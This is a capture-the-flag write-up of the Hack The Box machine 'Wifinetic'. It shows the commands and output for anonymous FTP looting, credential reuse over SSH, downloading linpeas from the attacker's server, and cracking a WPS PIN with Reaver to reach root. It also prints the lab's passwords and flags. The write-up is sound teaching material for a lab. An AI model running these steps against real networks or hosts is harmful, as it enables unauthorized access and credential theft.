Wifinetic
Hack The Box Machine Writeup
Now that really looks like cloud computing!
Summary
Wifinetics is a very simple easy box that went straight into retirement. I would recommend this box as a good one for beginners to build confidence on. There are very few steps involved in the compromise and they are all pretty straight forward. To grab user.txt the attacker must find a ftp share with anonymous access enabled. This contains a tar backup archive within which one can find both a username and a password. Using these in combination with SSH results in a shell as the netadmin user and user.txt.
The privilege escalation was the hardest part of the box. It starts by noticing the strange things going on with wireless network interfaces such as an AP being created through a wpa_suplicant process and a monitor interface. Reaver, a WPS(web protected setup) password cracking application can also be enumerated through capabilities. Putting 2 and 2 together the attacker can then use Reaver with the monitor interface and the AP to crack the AP’s WPS password. This can then be used to switch to the root user and complete the box.
Life is a series of hard choices
Video Link
Check out my video walkthrough
User
Abusing anonymous FTP
I began with the traditional nmap scan with -sC for running default scripts and -sV for version enumeration.
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap -sC -sV 10.10.11.247
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-17 13:17 EDT
Nmap scan report for 10.10.11.247
Host is up (0.035s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 4434 Jul 31 11:03 MigrateOpenWrt.txt
| -rw-r--r-- 1 ftp ftp 2501210 Jul 31 11:03 ProjectGreatMigration.pdf
| -rw-r--r-- 1 ftp ftp 60857 Jul 31 11:03 ProjectOpenWRT.pdf
| -rw-r--r-- 1 ftp ftp 40960 Sep 11 15:25 backup-OpenWrt-2023-07-26.tar
|_-rw-r--r-- 1 ftp ftp 52946 Jul 31 11:03 employees_wellness.pdf
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.14.30
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
53/tcp open tcpwrapped
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.52 seconds
This scan shows FTP is open to anonymous authentication and there are a couple files that I can grab. I used the prompt command to silence the download prompt message and mget \* to grab all the files in the share.
──(kali㉿kali)-[~/Desktop]
└─$ ftp 10.10.11.247
Connected to 10.10.11.247.
220 (vsFTPd 3.0.3)
Name (10.10.11.247:kali): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> prompt
Interactive mode off.
ftp> mget *
local: MigrateOpenWrt.txt remote: MigrateOpenWrt.txt
229 Entering Extended Passive Mode (|||42131|)
150 Opening BINARY mode data connection for MigrateOpenWrt.txt (4434 bytes).
100% |***************************************************************************************************| 4434 50.33 MiB/s 00:00 ETA
226 Transfer complete.
<...>
Looking through the files, what stands out is the backup tar archive. This can be extracted with the tar -xf command and contains and etc folder.
┌──(kali㉿kali)-[~/Desktop]
└─$ tar -xf backup-OpenWrt-2023-07-26.tar
┌──(kali㉿kali)-[~/Desktop]
└─$ ls -la etc
total 72
drwxr-xr-x 7 kali kali 4096 Sep 11 11:23 .
drwxr-xr-x 3 kali kali 4096 Sep 17 13:20 ..
drwxr-xr-x 2 kali kali 4096 Sep 11 11:22 config
drwxr-xr-x 2 kali kali 4096 Sep 11 11:22 dropbear
-rw-r--r-- 1 kali kali 227 Jul 26 06:08 group
-rw-r--r-- 1 kali kali 110 Apr 27 16:28 hosts
-rw-r--r-- 1 kali kali 183 Apr 27 16:28 inittab
drwxr-xr-x 2 kali kali 4096 Sep 11 11:22 luci-uploads
drwxr-xr-x 2 kali kali 4096 Sep 11 11:22 nftables.d
drwxr-xr-x 3 kali kali 4096 Sep 11 11:22 opkg
-rw-r--r-- 1 kali kali 420 Jul 26 06:09 passwd
-rw-r--r-- 1 kali kali 1046 Apr 27 16:28 profile
-rw-r--r-- 1 kali kali 132 Apr 27 16:28 rc.local
-rw-r--r-- 1 kali kali 9 Apr 27 16:28 shells
-rw-r--r-- 1 kali kali 475 Apr 27 16:28 shinit
-rw-r--r-- 1 kali kali 80 Apr 27 16:28 sysctl.conf
-rw-r--r-- 1 kali kali 745 Jul 24 15:15 uhttpd.crt
-rw-r--r-- 1 kali kali 121 Jul 24 15:15 uhttpd.key
Opening a tar archive be like
Looking through this backup reveals a /etc/passwd file from which I grabbed the only non default username of netadmin. I then used a find command that executes grep to search for useful information.
┌──(kali㉿kali)-[~/Desktop]
└─$ cat etc/passwd
root:x:0:0:root:/root:/bin/ash
daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
network:*:101:101:network:/var:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false
ntp:x:123:123:ntp:/var/run/ntp:/bin/false
dnsmasq:x:453:453:dnsmasq:/var/run/dnsmasq:/bin/false
logd:x:514:514:logd:/var/run/logd:/bin/false
ubus:x:81:81:ubus:/var/run/ubus:/bin/false
netadmin:x:999:999::/home/netadmin:/bin/false
┌──(kali㉿kali)-[~/Desktop/etc]
└─$ find . -type f -exec grep -i 'pass' {} \; -print
option password '$p$root'
./config/rpcd
option passwd '/etc/passwd'
./config/luci
option key 'VeRyUniUqWiFIPasswrd1!'
option key 'VeRyUniUqWiFIPasswrd1!'
./config/wireless
option PasswordAuth 'on'
option RootPasswordAuth 'on'
./config/dropbear
export HOME=$(grep -e "^${USER:-root}:" /etc/passwd | cut -d ":" -f 6)
There is no root password defined on this device!
Use the "passwd" command to set up a new password
./profile
Here i used the string 'pass' to search for passwords. The -print flag also reveals the file the string is taken out of below it. This search reveals a password for what appears to be a WIFI network in the ./config/wireless file. Strangely enough this password is only found by the find command because it has the string pass within it. Looking at the file itself I noticed that it was a 'key' value for 2 wireless interfaces. This is a good example of another string to search for when quickly parsing a large amount of files (key). Since I already had a username (netadmin) and port 22 was open I tried these creds together and ended up getting a foothold shell. From here I grabbed the user.txt file.
┌──(kali㉿kali)-[~/Desktop/etc]
└─$ cat ./config/wireless
<...>
config wifi-iface 'wifinet0
<...>
option key 'VeRyUniUqWiFIPasswrd1!'
┌──(kali㉿kali)-[~/Desktop/etc]
└─$ ssh netadmin@10.10.11.247
netadmin@10.10.11.247's password:
VeRyUniUqWiFIPasswrd1!
<...>
netadmin@wifinetic:~$ cat user.txt
514c38a7c9d32457af05945ad5120351
.png)
I still think it should be pronounced dog-e
Root
Recon with Linpeas
I started by doing my normal enumeration routine of sudo -l and looking for suid binaries for easy wins. This does not reveal anything of value in this case. I then go into automatic enumeration by bringing over and running linpeas. I used a simple python http server and curl in this instance.
netadmin@wifinetic:/tmp$ curl http://10.10.14.30/linpeas.sh > linpeash.sh
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 816k 100 816k 0 0 2865k 0 --:--:-- --:--:-- --:--:-- 2865k
┌──(kali㉿kali)-[~/tools]
└─$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.247 - - [17/Sep/2023 13:30:40] "GET /linpeas.sh HTTP/1.1" 200 -
netadmin@wifinetic:/tmp$ chmod +x linpeash.sh
Running linpeas shows a couple things that stand out. Firstly there are some strange things going on with the network. The host is running both a wireless AP interface and a wireless monitoring interface called mon0. Monitoring interfaces are commonly used to capture wireless packet handshakes that can then be brute forced and cracked resulting in the wireless network password. There is also a process running as root that calls wpa_supplicant which is used to create wireless access points on linux. This process is running the AP on interface wlan1.
<pre class="language-sh"><code class="lang-sh">netadmin@wifinetic:/tmp$ ./linpeash.sh <...> ╔══════════╣ Cleaned processes <strong>root 216269 0.0 0.2 13936 9128 ? Ss 17:30 0:00 /sbin/wpa_supplicant -u -s -c /etc/wpa_supplicant.conf -i wlan1 </strong>╔══════════╣ Interfaces mon0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 wlan1: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500 inet 192.168.1.23 netmask 255.255.255.0 broadcast 192.168.1.255 ether 02:00:00:00:01:00 txqueuelen 1000 (Ethernet) </code></pre>
Using Reaver to crack WPS password
Noticing this and looking at the capabilities section from linpeas, Reaver stands out. Reaver is a program used for cracking WPS passwords that comes standard on penetration testing OS like kali linux. Since there is a wireless AP running on the interface wlan1 and a monitor interface already set up I figured the route may be to crack the wireless AP password using Reaver. I ran iwconfig to display the wireless interface information again. From this i take the BSID ( Access Point ) of the wireless interface wlan1 as the parameter -b to Reaver (02:00:00:00:00:00) and the name of the monitoring interface (mon0) as the -i parameter.
╔══════════╣ Capabilities
<...>
/usr/bin/reaver = cap_net_raw+ep
netadmin@wifinetic:/tmp$ iwconfig
<...>
wlan1 IEEE 802.11 ESSID:"OpenWrt"
Mode:Managed Frequency:2.412 GHz Access Point: 02:00:00:00:00:00
Bit Rate:1 Mb/s Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
Link Quality=70/70 Signal level=-30 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:2 Missed beacon:0
mon0 IEEE 802.11 Mode:Monitor Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
netadmin@wifinetic:/tmp$ reaver -i mon0 -b 02:00:00:00:00:00
Reaver v1.6.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Waiting for beacon from 02:00:00:00:00:00
[+] Received beacon from 02:00:00:00:00:00
[!] Found packet with bad FCS, skipping...
[+] Associated with 02:00:00:00:00:00 (ESSID: OpenWrt)
[+] WPS PIN: '12345670'
[+] WPA PSK: 'WhatIsRealAnDWhAtIsNot51121!'
[+] AP SSID: 'OpenWrt'
The speed with which Reaver cracks the WPS password is evidence as to why WPS is depreciated and is no longer safe technology. Since the process running the wireless AP (wpa_supplicant) is root as discovered previously I assumed this wireless AP password may have been reused. Using the su - command and the password (WhatIsRealAnDWhAtIsNot51121!) works to switch to a root shell and from here the box is completed. I grabbed root.txt and dropped the mic.
netadmin@wifinetic:/tmp$ su -
Password: WhatIsRealAnDWhAtIsNot51121!
root@wifinetic:~#cat root.txt
5a48a4dbd007aa60ff391c0897ce695f
.png)
Thank you for reading, until next time!
Other resources
0xdf writeup
0xdf.gitlab.io
Ippsec video walkthrough